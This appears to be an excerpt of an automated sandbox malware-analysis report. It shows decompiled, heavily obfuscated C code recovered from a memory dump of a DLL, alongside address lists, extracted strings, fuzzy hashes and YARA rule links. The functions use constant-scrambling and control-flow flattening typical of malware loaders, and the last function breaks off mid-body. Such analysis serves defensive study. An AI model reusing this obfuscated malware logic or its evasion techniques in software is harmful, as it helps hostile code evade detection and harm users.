				_v60 = 0x219e56;
				_v60 = _v60 + 0xb662;
				_v60 = _v60 ^ 0x0027d419;
				_v40 = 0x2a05da;
				_v40 = _v40 + 0x6602;
				_t179 = 0x29;
				_v40 = _v40 * 0x44;
				_v40 = _v40 ^ 0x0b4dd569;
				_v16 = 0x6eceb9;
				_v16 = _v16 >> 0xa;
				_v16 = _v16 >> 6;
				_v16 = _v16 / _t179;
				_v16 = _v16 ^ 0x000aa7ad;
				_v24 = 0x497b27;
				_v24 = _v24 >> 2;
				_v24 = _v24 ^ 0x04034cbc;
				_v24 = _v24 ^ 0x0a090d47;
				_v24 = _v24 ^ 0x0e10054a;
				_v20 = 0x13dbc1;
				_v20 = _v20 + 0x8cb8;
				_v20 = _v20 >> 6;
				_v20 = _v20 + 0xffff6ed9;
				_v20 = _v20 ^ 0xfff380ff;
				_v76 = 0x7a7d5b;
				_t50 =  &_v76; // 0x7a7d5b
				_t180 = 0x31;
				_v76 =  *_t50 * 0x62;
				_v76 = _v76 ^ 0x2eec03a6;
				_v12 = 0x98d917;
				_v12 = _v12 + 0xffff4733;
				_v12 = _v12 | 0x50f5682b;
				_v12 = _v12 << 6;
				_v12 = _v12 ^ 0x3f5c875b;
				_v8 = 0x9f08f0;
				_v8 = _v8 + 0xa1ef;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 + 0x1c9e;
				_v8 = _v8 ^ 0x000863ad;
				_v36 = 0x471341;
				_v36 = _v36 + 0xd699;
				_v36 = _v36 / _t180;
				_v36 = _v36 ^ 0x00086e52;
				_v56 = 0xb9c45c;
				_v56 = _v56 + 0xfccf;
				_v56 = _v56 ^ 0x00bbf63d;
				_v44 = 0x136e87;
				_v44 = _v44 >> 0xa;
				_t181 = 0x2c;
				_v44 = _v44 * 0x74;
				_v44 = _v44 ^ 0x00009119;
				_v68 = 0x2e79bd;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 ^ 0x00041aec;
				_v48 = 0x8d663a;
				_v48 = _v48 + 0xf58;
				_v48 = _v48 / _t181;
				_v48 = _v48 ^ 0x00058341;
				_v64 = 0x6523b9;
				_v64 = _v64 + 0x509;
				_v64 = _v64 ^ 0x006c9c0c;
				_v32 = 0xb3ed2e;
				_v32 = _v32 + 0x2435;
				_v32 = _v32 + 0xffff5ce9;
				_v32 = _v32 ^ 0x00b83a63;
				_v28 = 0x6600a9;
				_v28 = _v28 | 0x8c901e70;
				_v28 = _v28 >> 6;
				_v28 = _v28 >> 5;
				_v28 = _v28 ^ 0x001df486;
				_v72 = 0xc1ceac;
				_v72 = _v72 << 0xa;
				_v72 = _v72 ^ 0x0730a875;
				_t170 = E10001A5C( *0x10025208 + 0x1c, _v52, _v60);
				_t203 = _a4 + 0x2c;
				if(E1000DB91(_v40, _t170, _a4 + 0x2c, _v16, _v24) != 0) {
					_push(_v8);
					_push(_v12);
					_push(_v76);
					E100049CE( *((intOrPtr*)(_a8 + 0x28)), _t203, E1000416C(_v20, 0x100017d4), _v36, _v56, _v20, _v44, _v68);
					E1000B952(_v48, _t174, _v64, _v32);
					E1000D84C(_v28, _v72,  &_v596);
				}
				return 1;
			}

0x10009db1
0x10009dba
0x10009dbe
0x10009dc5
0x10009dcc
0x10009dd3
0x10009dda
0x10009de1
0x10009def
0x10009df2
0x10009df5
0x10009dfc
0x10009e03
0x10009e07
0x10009e12
0x10009e15
0x10009e1c
0x10009e23
0x10009e27
0x10009e2e
0x10009e35
0x10009e3c
0x10009e43
0x10009e4a
0x10009e4e
0x10009e55
0x10009e5c
0x10009e63
0x10009e67
0x10009e6a
0x10009e6d
0x10009e74
0x10009e7b
0x10009e82
0x10009e89
0x10009e8d
0x10009e94
0x10009e9b
0x10009ea2
0x10009ea6
0x10009ead
0x10009eb4
0x10009ebb
0x10009ec9
0x10009ecc
0x10009ed3
0x10009eda
0x10009ee1
0x10009ee8
0x10009eef
0x10009ef7
0x10009ef8
0x10009efb
0x10009f02
0x10009f09
0x10009f0d
0x10009f14
0x10009f1b
0x10009f27
0x10009f2a
0x10009f31
0x10009f38
0x10009f3f
0x10009f46
0x10009f4d
0x10009f54
0x10009f5b
0x10009f62
0x10009f69
0x10009f70
0x10009f74
0x10009f78
0x10009f7f
0x10009f86
0x10009f8a
0x10009fa0
0x10009fb3
0x10009fc1
0x10009fc4
0x10009fcc
0x10009fcf
0x10009ffa
0x1000a00a
0x1000a01c
0x1000a024
0x1000a02c

Strings

[}z, xrefs: 10009E63
5$, xrefs: 10009F4D
G, xrefs: 10009E2E

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID: lstrcmpi
String ID: 5$$G$[}z
API String ID: 1586166983-3789136715
Opcode ID: 9e98b6fcf69e54c21faa77b3fcdde8c38f5c6c3aca1ead93269d626c617bc0b8
Instruction ID: cc2bbc3aedf70d1065f26559c41ffb2e0b63d9110e5a3137da6f3a907bc9bd26
Opcode Fuzzy Hash: 9e98b6fcf69e54c21faa77b3fcdde8c38f5c6c3aca1ead93269d626c617bc0b8
Instruction Fuzzy Hash: 9471FF72D0121DEBDF48CFA1D98A4EEBBB2FF48318F208059E411B6264E7B55A49CF54

Uniqueness

Uniqueness Score: -1.00%

Function 1000B9D5, Relevance: 3.9, Strings: 3, Instructions: 126
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E1000B9D5(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				void* _t101;
				void* _t110;
				intOrPtr* _t115;
				void* _t117;
				intOrPtr* _t128;
				intOrPtr _t129;
				signed int _t130;
				void* _t132;
				void* _t133;

				_push(_a12);
				_t128 = _a8;
				_t115 = __edx;
				_push(_t128);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100167B8(_t101);
				_v40 = 0x83e617;
				_t129 = 0;
				_v36 = 0;
				_t133 = _t132 + 0x14;
				_v60 = 0xa0e3f;
				_v60 = _v60 + 0xffff055d;
				_t117 = 0x90ba543;
				_v60 = _v60 >> 0xe;
				_v60 = _v60 ^ 0x00000024;
				_v56 = 0x743aac;
				_v56 = _v56 + 0xffffac20;
				_t130 = 0xe;
				_v56 = _v56 * 0x49;
				_v56 = _v56 ^ 0x210cd02c;
				_v48 = 0xa550c5;
				_v48 = _v48 << 0xd;
				_v48 = _v48 ^ 0xaa17ef84;
				_v80 = 0xe9b3ec;
				_v80 = _v80 * 0x4e;
				_v80 = _v80 >> 0xe;
				_v80 = _v80 + 0xffff141b;
				_v80 = _v80 ^ 0x000f7848;
				_v84 = 0x633153;
				_v84 = _v84 + 0xffffb6e4;
				_v84 = _v84 | 0xafc5edc4;
				_v84 = _v84 ^ 0xafe5e1a9;
				_v52 = 0xe26deb;
				_v52 = _v52 + 0xffffec66;
				_v52 = _v52 ^ 0x00e0142f;
				_v64 = 0x42cff9;
				_v64 = _v64 | 0xa8bb902b;
				_v64 = _v64 + 0x43f4;
				_v64 = _v64 ^ 0xa8fe1bd3;
				_v44 = 0x460f5e;
				_v44 = _v44 * 0x14;
				_v44 = _v44 ^ 0x057a74cd;
				_v68 = 0xb30f76;
				_v68 = _v68 + 0xffff2e47;
				_v68 = _v68 * 0x32;
				_v68 = _v68 ^ 0x22df49a0;
				_v76 = 0xeacafb;
				_v76 = _v76 << 1;
				_v76 = _v76 * 0x12;
				_v76 = _v76 << 3;
				_v76 = _v76 ^ 0x0827df06;
				_v72 = 0x70f58a;
				_v72 = _v72 + 0x91fd;
				_v72 = _v72 / _t130;
				_v72 = _v72 ^ 0x0007d8ce;
				do {
					while(_t117 != 0x12f3d73) {
						if(_t117 == 0x90ba543) {
							_t117 = 0x12f3d73;
							continue;
						} else {
							if(_t117 != 0xe16dbca) {
								goto L10;
							} else {
								_push(_t117);
								E1000AC7C(_v60,  *_t115, _t117, _v64, _v44,  &_v32, _v68, _v76,  *((intOrPtr*)(_t115 + 4)), _v72,  *((intOrPtr*)( *0x10025218 + 0x5c)));
								_t129 =  ==  ? 1 : _t129;
							}
						}
						L5:
						return _t129;
					}
					_push( *_t128);
					_t110 = E100065BD( &_v32, _v48, _v80, _v84, _t117,  *((intOrPtr*)(_t128 + 4)), _v52);
					_t133 = _t133 + 0x18;
					if(_t110 == 0) {
						_t117 = 0xf3276ff;
						goto L10;
					} else {
						_t117 = 0xe16dbca;
						continue;
					}
					goto L5;
					L10:
				} while (_t117 != 0xf3276ff);
				goto L5;
			}

0x1000b9dc
0x1000b9e0
0x1000b9e4
0x1000b9e6
0x1000b9e7
0x1000b9eb
0x1000b9ec
0x1000b9ed
0x1000b9f2
0x1000b9fa
0x1000b9fc
0x1000ba00
0x1000ba03
0x1000ba0d
0x1000ba15
0x1000ba1a
0x1000ba1f
0x1000ba24
0x1000ba2c
0x1000ba3b
0x1000ba3c
0x1000ba40
0x1000ba48
0x1000ba50
0x1000ba55
0x1000ba5d
0x1000ba6a
0x1000ba6e
0x1000ba73
0x1000ba7b
0x1000ba83
0x1000ba8b
0x1000ba93
0x1000ba9b
0x1000baa3
0x1000baab
0x1000bab3
0x1000babb
0x1000bac3
0x1000bacb
0x1000bad3
0x1000badb
0x1000bae8
0x1000baec
0x1000baf4
0x1000bafc
0x1000bb09
0x1000bb0d
0x1000bb15
0x1000bb1d
0x1000bb26
0x1000bb2a
0x1000bb2f
0x1000bb37
0x1000bb3f
0x1000bb52
0x1000bb56
0x1000bb5e
0x1000bb5e
0x1000bb68
0x1000bbc0
0x00000000
0x1000bb6a
0x1000bb70
0x00000000
0x1000bb76
0x1000bb7b
0x1000bba2
0x1000bbb3
0x1000bbb3
0x1000bb70
0x1000bbb7
0x1000bbbf
0x1000bbbf
0x1000bbc4
0x1000bbde
0x1000bbe3
0x1000bbe8
0x1000bbf4
0x00000000
0x1000bbea
0x1000bbea
0x00000000
0x1000bbea
0x00000000
0x1000bbf9
0x1000bbf9
0x00000000

Strings

$, xrefs: 1000BA1F
m, xrefs: 1000BAA3
S1c, xrefs: 1000BA83

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: $$S1c$m
API String ID: 0-1382513270
Opcode ID: be78ce386de01b845cdbef549c342b6a40d617c3c988d4b609193b741c307907
Instruction ID: 92053e8af3f0516a2abd6669dfc42d678157a4f20dc094c7a99d893e3fd296f1
Opcode Fuzzy Hash: be78ce386de01b845cdbef549c342b6a40d617c3c988d4b609193b741c307907
Instruction Fuzzy Hash: 355151710087429FC758CF65C98581BBBE1FBC8798F409A1DF186A6264C3B1CA49CF83

Uniqueness

Uniqueness Score: -1.00%

Function 100060E8, Relevance: 3.9, Strings: 3, Instructions: 111
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E100060E8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t80;
				void* _t88;
				void* _t91;
				void* _t93;
				void* _t95;
				void* _t105;
				void* _t106;
				signed int* _t109;

				_push(_a12);
				_t105 = __edx;
				_t93 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100167B8(_t80);
				_v72 = 0x60a054;
				_t109 =  &(( &_v80)[5]);
				_t106 = 0;
				_t95 = 0xe5ea9ee;
				_v72 = _v72 * 0x7f;
				_v72 = _v72 * 0x67;
				_v72 = _v72 | 0xb3fbf9c8;
				_v72 = _v72 ^ 0xfbf1093c;
				_v76 = 0x19af1c;
				_v76 = _v76 << 8;
				_v76 = _v76 << 0xa;
				_v76 = _v76 * 0x75;
				_v76 = _v76 ^ 0x1f323f4c;
				_v52 = 0x3f56d8;
				_v52 = _v52 ^ 0xb6fc183f;
				_v52 = _v52 ^ 0xb6c54baa;
				_v56 = 0xaa8052;
				_v56 = _v56 ^ 0x5c209cd4;
				_v56 = _v56 ^ 0x5c8cecc6;
				_v60 = 0xb3e7b1;
				_v60 = _v60 * 0x13;
				_v60 = _v60 ^ 0x0d5400a1;
				_v80 = 0xf16da3;
				_v80 = _v80 ^ 0x60c58ee2;
				_v80 = _v80 + 0xffffa417;
				_v80 = _v80 + 0x3999;
				_v80 = _v80 ^ 0x6035793f;
				_v48 = 0x3b473;
				_v48 = _v48 + 0xffff0029;
				_v48 = _v48 ^ 0x000e641f;
				_v64 = 0xdd452b;
				_v64 = _v64 + 0xffff8322;
				_v64 = _v64 | 0xc03a1766;
				_v64 = _v64 ^ 0xc0fed6a7;
				_v68 = 0x18734d;
				_v68 = _v68 * 0x38;
				_v68 = _v68 ^ 0x6b394e30;
				_v68 = _v68 ^ 0x445fd81e;
				_v68 = _v68 ^ 0x2a3a3c4e;
				while(_t95 != 0x5aee17c) {
					if(_t95 == 0x9abfaa3) {
						E1000A488(_t93,  &_v44, _v72, _v76);
						_t109 =  &(_t109[2]);
						_t95 = 0xec56212;
						continue;
					} else {
						if(_t95 == 0xe5ea9ee) {
							_t95 = 0x9abfaa3;
							continue;
						} else {
							if(_t95 != 0xec56212) {
								L10:
								__eflags = _t95 - 0xf7ab6e0;
								if(__eflags != 0) {
									continue;
								}
							} else {
								_t91 = E1001F6F2(_v52, _v56, _t105, _v60, _v80,  &_v44);
								_t109 =  &(_t109[4]);
								if(_t91 != 0) {
									_t95 = 0x5aee17c;
									continue;
								}
							}
						}
					}
					return _t106;
				}
				_t88 = E10003FB0(_t105 + 4, _v48, __eflags, _v64, _v68,  &_v44);
				_t109 =  &(_t109[3]);
				__eflags = _t88;
				_t106 =  !=  ? 1 : _t106;
				_t95 = 0xf7ab6e0;
				goto L10;
			}

0x100060ef
0x100060f3
0x100060f5
0x100060f7
0x100060fb
0x100060ff
0x10006100
0x10006101
0x10006106
0x1000610e
0x10006116
0x10006118
0x10006122
0x1000612b
0x1000612f
0x10006137
0x1000613f
0x10006147
0x1000614c
0x10006156
0x1000615a
0x10006162
0x1000616a
0x10006172
0x1000617a
0x10006182
0x1000618a
0x10006192
0x1000619f
0x100061a3
0x100061ab
0x100061b3
0x100061bb
0x100061c3
0x100061cb
0x100061d3
0x100061db
0x100061e3
0x100061eb
0x100061f3
0x100061fb
0x10006203
0x1000620b
0x10006218
0x1000621c
0x10006224
0x1000622c
0x10006234
0x1000623e
0x1000628b
0x10006290
0x10006293
0x00000000
0x10006240
0x10006246
0x10006276
0x00000000
0x10006248
0x1000624e
0x100062c3
0x100062c3
0x100062c9
0x00000000
0x00000000
0x10006250
0x10006266
0x1000626b
0x10006270
0x10006272
0x00000000
0x10006272
0x10006270
0x1000624e
0x10006246
0x100062d8
0x100062d8
0x100062ae
0x100062b5
0x100062b9
0x100062bb
0x100062be
0x00000000

Strings

), xrefs: 100061DB
N<:*, xrefs: 1000622C
?y5`, xrefs: 100061CB

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: )$?y5`$N<:*
API String ID: 0-4231073426
Opcode ID: e5bd5a7394ac6d7d1fb88b2021fa203571cfbfde502bdbdbcfb3982fd92632af
Instruction ID: df57ed1efdeba07338a933fa6dec030f0db3728db8ab634ce7a87920d3c5bcf5
Opcode Fuzzy Hash: e5bd5a7394ac6d7d1fb88b2021fa203571cfbfde502bdbdbcfb3982fd92632af
Instruction Fuzzy Hash: 564173710083429FC748DF20994681FBBE6FFD8788F604A1EF596A6261D371CA498F97

Uniqueness

Uniqueness Score: -1.00%

Function 10011EFC, Relevance: 3.9, Strings: 3, Instructions: 107
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E10011EFC(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t75;
				void* _t82;
				void* _t84;
				void* _t87;
				void* _t89;
				void* _t102;
				signed int _t103;
				signed int* _t106;

				_push(_a12);
				_t101 = _a8;
				_t87 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100167B8(_t75);
				_v76 = 0x42ea65;
				_t106 =  &(( &_v76)[5]);
				_v76 = _v76 ^ 0x8daf598d;
				_v76 = _v76 | 0xceb9eb8c;
				_t102 = 0;
				_v76 = _v76 >> 0xd;
				_t89 = 0x5ae974c;
				_v76 = _v76 ^ 0x000fe9a7;
				_v56 = 0xe20753;
				_v56 = _v56 | 0xba8d5d03;
				_v56 = _v56 ^ 0xbae0799c;
				_v48 = 0x9de117;
				_v48 = _v48 >> 2;
				_v48 = _v48 ^ 0x00257e2b;
				_v52 = 0x2b65fa;
				_v52 = _v52 | 0x58190908;
				_v52 = _v52 ^ 0x583fc555;
				_v68 = 0xc009f6;
				_v68 = _v68 + 0xb637;
				_v68 = _v68 << 0xf;
				_v68 = _v68 ^ 0x60177134;
				_v60 = 0x805bc0;
				_t103 = 0x3e;
				_v60 = _v60 * 0x5a;
				_v60 = _v60 / _t103;
				_v60 = _v60 ^ 0x00b3875b;
				_v64 = 0xac5f65;
				_v64 = _v64 | 0xbb125e84;
				_v64 = _v64 + 0xffff44de;
				_v64 = _v64 ^ 0xbbbc6535;
				_v72 = 0x722f;
				_v72 = _v72 ^ 0x06552975;
				_v72 = _v72 >> 0xe;
				_v72 = _v72 * 0x5a;
				_v72 = _v72 ^ 0x000f29c2;
				do {
					while(_t89 != 0x2418eb8) {
						if(_t89 == 0x3f17baa) {
							_t84 = E10003FB0(_t101 + 0x30, _v48, __eflags, _v52, _v68,  &_v44);
							_t106 =  &(_t106[3]);
							__eflags = _t84;
							if(__eflags != 0) {
								_t89 = 0x2418eb8;
								continue;
							}
						} else {
							if(_t89 == 0x5ae974c) {
								_t89 = 0x8d8f8d9;
								continue;
							} else {
								if(_t89 != 0x8d8f8d9) {
									goto L10;
								} else {
									E1000A488(_t87,  &_v44, _v76, _v56);
									_t106 =  &(_t106[2]);
									_t89 = 0x3f17baa;
									continue;
								}
							}
						}
						goto L11;
					}
					_t82 = E10003FB0(_t101 + 0x14, _v60, __eflags, _v64, _v72,  &_v44);
					_t106 =  &(_t106[3]);
					__eflags = _t82;
					_t102 =  !=  ? 1 : _t102;
					_t89 = 0x6550e9f;
					L10:
					__eflags = _t89 - 0x6550e9f;
				} while (__eflags != 0);
				L11:
				return _t102;
			}

0x10011f03
0x10011f07
0x10011f0b
0x10011f0d
0x10011f0e
0x10011f12
0x10011f13
0x10011f14
0x10011f19
0x10011f21
0x10011f24
0x10011f2e
0x10011f36
0x10011f38
0x10011f3d
0x10011f42
0x10011f4a
0x10011f52
0x10011f5a
0x10011f62
0x10011f6a
0x10011f6f
0x10011f77
0x10011f7f
0x10011f87
0x10011f8f
0x10011f97
0x10011f9f
0x10011fa4
0x10011fac
0x10011fbb
0x10011fbc
0x10011fcb
0x10011fcf
0x10011fd7
0x10011fdf
0x10011fe7
0x10011fef
0x10011ff7
0x10011fff
0x10012007
0x10012011
0x10012015
0x1001201d
0x1001201d
0x10012027
0x10012071
0x10012076
0x10012079
0x1001207b
0x1001207d
0x00000000
0x1001207d
0x10012029
0x1001202f
0x10012056
0x00000000
0x10012031
0x10012037
0x00000000
0x10012039
0x10012047
0x1001204c
0x1001204f
0x00000000
0x1001204f
0x10012037
0x1001202f
0x00000000
0x10012027
0x10012095
0x1001209c
0x100120a0
0x100120a2
0x100120a5
0x100120aa
0x100120aa
0x100120aa
0x100120b7
0x100120bf

Strings

/r, xrefs: 10011FF7
eB, xrefs: 10011F19
+~%, xrefs: 10011F6F

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: +~%$/r$eB
API String ID: 0-3617770936
Opcode ID: fd60274f9b976b685fe7f3b3e6105bf0264ed01383722f5100fa4746448b9c32
Instruction ID: 53e799f30dd8c55fa67e912ef62b1892527fa05e56e87a7c93982248c9b3ad2a
Opcode Fuzzy Hash: fd60274f9b976b685fe7f3b3e6105bf0264ed01383722f5100fa4746448b9c32
Instruction Fuzzy Hash: EB4175B15083069FC748DE20D84682BBBE0FBC8788F500A1DF586A6261D774DA59CF97

Uniqueness

Uniqueness Score: -1.00%

Function 1001F90C, Relevance: 3.8, Strings: 3, Instructions: 65
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E1001F90C(void* __ecx, signed int __edx, intOrPtr _a4) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _t78;
				signed int _t87;
				signed int _t88;

				_v40 = _v40 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_v48 = 0x5c5e7c;
				_v44 = 0x637344;
				_v24 = 0x767346;
				_v24 = _v24 ^ 0x75b184f7;
				_v24 = _v24 ^ 0x75c8833c;
				_v16 = 0xacc457;
				_v16 = _v16 + 0x6dd8;
				_v16 = _v16 + 0xffffc55c;
				_v16 = _v16 ^ 0x00ac5da2;
				_v8 = 0x9be28d;
				_v8 = _v8 + 0xe5f9;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 + 0x83a;
				_v8 = _v8 ^ 0x000ca975;
				_v20 = 0xbf427;
				_t88 = __edx;
				_t87 = 0x5b;
				_v20 = _v20 / _t87;
				_v20 = _v20 ^ 0x000b2985;
				_v32 = 0x44ff21;
				_v32 = _v32 ^ 0x283e26ac;
				_v32 = _v32 ^ 0x28717f89;
				_v12 = 0x598a59;
				_v12 = _v12 | 0x745eced1;
				_v12 = _v12 * 0x14;
				_v12 = _v12 + 0xfe66;
				_v12 = _v12 ^ 0x17776f0d;
				_v28 = 0xb57915;
				_v28 = _v28 >> 5;
				_v28 = _v28 ^ 0x0002090a;
				if( *((intOrPtr*)(0x10025228 + __edx * 4)) == 0) {
					_t78 = E1001DC3E(__ecx);
					_push(_v28);
					_push(_t78);
					_push(_a4);
					 *((intOrPtr*)(0x10025228 + _t88 * 4)) = E100103C9(_v32, _v12);
				}
				return  *((intOrPtr*)(0x10025228 + _t88 * 4));
			}

0x1001f912
0x1001f916
0x1001f91a
0x1001f921
0x1001f928
0x1001f92f
0x1001f936
0x1001f93d
0x1001f944
0x1001f94b
0x1001f952
0x1001f959
0x1001f960
0x1001f967
0x1001f96b
0x1001f972
0x1001f979
0x1001f985
0x1001f98b
0x1001f98e
0x1001f991
0x1001f998
0x1001f99f
0x1001f9a6
0x1001f9ad
0x1001f9b4
0x1001f9bf
0x1001f9c2
0x1001f9c9
0x1001f9d0
0x1001f9d7
0x1001f9db
0x1001f9ea
0x1001f9fd
0x1001fa02
0x1001fa0b
0x1001fa0c
0x1001fa17
0x1001fa17
0x1001fa2a

Strings

Fsv, xrefs: 1001F928
|^\, xrefs: 1001F91A
Dsc, xrefs: 1001F921

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: Dsc$Fsv$|^\
API String ID: 0-3759921868
Opcode ID: 90c74a6ba7e61a2663d1e575275c0be67d77569dcc6accbcb4059b26abaafc42
Instruction ID: d7480f17cca580aa99f3de644df54328584bf17b880358a23fdeef58c7cd9836
Opcode Fuzzy Hash: 90c74a6ba7e61a2663d1e575275c0be67d77569dcc6accbcb4059b26abaafc42
Instruction Fuzzy Hash: 2A313571D0021DEBDB44CFEAD9495AEBBB4FB01329F208159D411B6250C3B89A49CF85

Uniqueness

Uniqueness Score: -1.00%

Function 1001F0A7, Relevance: 2.9, Strings: 2, Instructions: 369
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E1001F0A7(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				intOrPtr _v160;
				char _v200;
				short _v744;
				short _v746;
				char _v748;
				signed int _v792;
				char _v1312;
				char _v1832;
				void* _t345;
				signed int _t381;
				signed int _t383;
				signed int _t384;
				signed int _t387;
				intOrPtr _t396;
				void* _t398;
				void* _t439;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t458;
				signed int _t459;
				void* _t462;
				void* _t463;

				_push(_a20);
				_t396 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100167B8(_t345);
				_v28 = 0x3f55;
				_t463 = _t462 + 0x1c;
				_v28 = _v28 ^ 0xd4fb8a34;
				_v28 = _v28 ^ 0x40105222;
				_t398 = 0x1cf3d31;
				_v28 = _v28 + 0xa243;
				_v28 = _v28 ^ 0x94ec8996;
				_v36 = 0xb0df2f;
				_v36 = _v36 << 0xf;
				_v36 = _v36 << 0xd;
				_t451 = 0x7c;
				_v36 = _v36 / _t451;
				_v36 = _v36 ^ 0x01e6f207;
				_v92 = 0x9da0cd;
				_v92 = _v92 >> 3;
				_t452 = 0x62;
				_v92 = _v92 * 0xb;
				_v92 = _v92 ^ 0x00ddc18d;
				_v64 = 0xbff366;
				_v64 = _v64 ^ 0x832f5a43;
				_v64 = _v64 + 0x784f;
				_v64 = _v64 ^ 0x83988a1b;
				_v128 = 0xbc4806;
				_v128 = _v128 + 0xffff9762;
				_v128 = _v128 ^ 0x00b82e3b;
				_v80 = 0x25c9f8;
				_v80 = _v80 * 0x13;
				_v80 = _v80 << 0xf;
				_v80 = _v80 ^ 0xfeb741b0;
				_v88 = 0x9ec909;
				_v88 = _v88 / _t452;
				_v88 = _v88 | 0x147c2e6a;
				_v88 = _v88 ^ 0x147c113a;
				_v72 = 0xdec110;
				_v72 = _v72 | 0x8a5f4b7c;
				_v72 = _v72 ^ 0xea17037f;
				_v72 = _v72 ^ 0x60cc43b2;
				_v20 = 0x4e0e1e;
				_v20 = _v20 | 0x6dbe6bba;
				_v20 = _v20 + 0xd404;
				_v20 = _v20 * 0x42;
				_v20 = _v20 ^ 0x5bc59562;
				_v52 = 0xb04cc6;
				_v52 = _v52 * 0xe;
				_v52 = _v52 * 0xb;
				_v52 = _v52 << 6;
				_v52 = _v52 ^ 0x8380759a;
				_v100 = 0xb4f1ca;
				_v100 = _v100 + 0xffff8702;
				_v100 = _v100 >> 4;
				_v100 = _v100 ^ 0x000e8739;
				_v112 = 0x89c26;
				_v112 = _v112 + 0x9174;
				_v112 = _v112 ^ 0x000b9f2d;
				_v116 = 0xc461cf;
				_v116 = _v116 | 0x6621a1d7;
				_v116 = _v116 ^ 0x66e32fdf;
				_v104 = 0x3386f6;
				_v104 = _v104 + 0xc4a4;
				_v104 = _v104 + 0xffffcf77;
				_v104 = _v104 ^ 0x00325983;
				_v32 = 0xcf7fa6;
				_t453 = 0x48;
				_v32 = _v32 * 0x66;
				_v32 = _v32 / _t453;
				_t454 = 0x69;
				_v32 = _v32 * 0x66;
				_v32 = _v32 ^ 0x7519a437;
				_v140 = 0xa4e17a;
				_v140 = _v140 ^ 0xf021ef1b;
				_v140 = _v140 ^ 0xf0855afc;
				_v60 = 0x36dea5;
				_v60 = _v60 | 0x2490b0f7;
				_v60 = _v60 >> 3;
				_v60 = _v60 ^ 0x049009b7;
				_v12 = 0xae5059;
				_v12 = _v12 | 0xe60d5cb3;
				_v12 = _v12 + 0xffff7d02;
				_v12 = _v12 | 0x31702bd5;
				_v12 = _v12 ^ 0xf7f5bfe9;
				_v44 = 0xa213d5;
				_v44 = _v44 / _t454;
				_t455 = 0x3f;
				_v44 = _v44 * 0x3d;
				_v44 = _v44 * 0x3f;
				_v44 = _v44 ^ 0x17229264;
				_v76 = 0xaf1082;
				_v76 = _v76 >> 3;
				_v76 = _v76 * 0x7a;
				_v76 = _v76 ^ 0x0a66190c;
				_v136 = 0x404689;
				_v136 = _v136 / _t455;
				_v136 = _v136 ^ 0x000b2c8a;
				_v68 = 0xf7f82f;
				_v68 = _v68 + 0xcb17;
				_v68 = _v68 + 0xffffe5f7;
				_v68 = _v68 ^ 0x00f6cb59;
				_v124 = 0xf10453;
				_v124 = _v124 | 0x3a9dbf19;
				_v124 = _v124 ^ 0x3af59d78;
				_v84 = 0xb7a30d;
				_t456 = 0x2f;
				_v84 = _v84 / _t456;
				_v84 = _v84 + 0xf6a4;
				_v84 = _v84 ^ 0x000b1b5b;
				_v132 = 0xbf7812;
				_t457 = 0x36;
				_v132 = _v132 / _t457;
				_v132 = _v132 ^ 0x000a75cd;
				_v16 = 0x820185;
				_v16 = _v16 ^ 0x51a4fc86;
				_v16 = _v16 >> 2;
				_v16 = _v16 | 0x74ace828;
